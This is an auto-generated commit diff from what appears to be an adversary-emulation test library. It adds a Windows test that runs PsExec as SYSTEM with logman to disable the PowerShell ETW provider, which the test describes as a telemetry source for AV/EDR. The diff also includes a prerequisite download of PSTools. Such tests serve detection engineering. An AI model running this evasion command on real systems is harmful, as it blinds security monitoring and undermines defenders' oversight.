Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -446,6 +446,7 @@ defense-evasion,T1562.003,Impair Command History Logging,1,Disable history colle
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
 defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
 defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
+defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -287,6 +287,7 @@ defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
+defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -709,6 +709,7 @@
 - [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
   - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
   - Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
+  - Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070 Indicator Removal on Host](../../T1070/T1070.md)
   - Atomic Test #1: Indicator Removal using FSUtil [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -488,7 +488,8 @@
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
+  - Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070 Indicator Removal on Host](../../T1070/T1070.md)
   - Atomic Test #1: Indicator Removal using FSUtil [windows]

atomics/Indexes/Matrices/windows-matrix.md

@@ -52,7 +52,7 @@
 |  |  | [Password Filter DLL](../../T1556.002/T1556.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
 |  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -30356,6 +30356,40 @@ defense-evasion:
           fi
         name: bash
         elevation_required: true
+    - name: Disable Powershell ETW Provider - Windows
+      auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
+      description: This test was created to disable the Microsoft Powershell ETW provider
+        by using the built-in Windows tool, logman.exe. This provider is used as a
+        common source of telemetry in AV/EDR solutions.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ps_exec_location:
+          description: Location of PSExec.
+          type: string
+          default: "$env:temp\\pstools\\PsExec.exe"
+        session:
+          description: The session to disable.
+          type: string
+          default: EventLog-Application
+        provider:
+          description: The provider to disable.
+          type: string
+          default: Microsoft-Windows-Powershell
+      dependency_executor_name: powershell
+      dependencies:
+      - description: PSExec must be installed on the machine.
+        prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
+        get_prereq_command: |-
+          start-bitstransfer -source "https://download.sysinternals.com/files/PSTools.zip" -destination "$env:temp\PStools.zip"
+          expand-archive -literalpath "$env:temp\PStools.zip" -destinationpath "$env:temp\pstools" -force
+      executor:
+        command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman
+          update trace "#{session}" --p "#{provider}" -ets
+        cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update
+          trace "#{session}" -p "#{provider}" -ets
+        name: powershell
+        elevation_required: true
   T1027.005:
     technique:
       object_marking_refs:

atomics/T1562.006/T1562.006.md

@@ -12,6 +12,8 @@ In the case of network-based reporting of indicators, an adversary may block tra
 
 - [Atomic Test #2 - Logging Configuration Changes on Linux Host](#atomic-test-2---logging-configuration-changes-on-linux-host)
 
+- [Atomic Test #3 - Disable Powershell ETW Provider - Windows](#atomic-test-3---disable-powershell-etw-provider---windows)
+
 
 <br/>
 
@@ -116,4 +118,56 @@ fi
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Disable Powershell ETW Provider - Windows
+This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6f118276-121d-4c09-bb58-a8fb4a72ee84
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ps_exec_location | Location of PSExec. | string | $env:temp&#92;pstools&#92;PsExec.exe|
+| session | The session to disable. | string | EventLog-Application|
+| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
+```
+
+#### Cleanup Commands:
+```powershell
+cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: PSExec must be installed on the machine.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+start-bitstransfer -source "https://download.sysinternals.com/files/PSTools.zip" -destination "$env:temp\PStools.zip"
+expand-archive -literalpath "$env:temp\PStools.zip" -destinationpath "$env:temp\pstools" -force
+```
+
+
+
+
 <br/>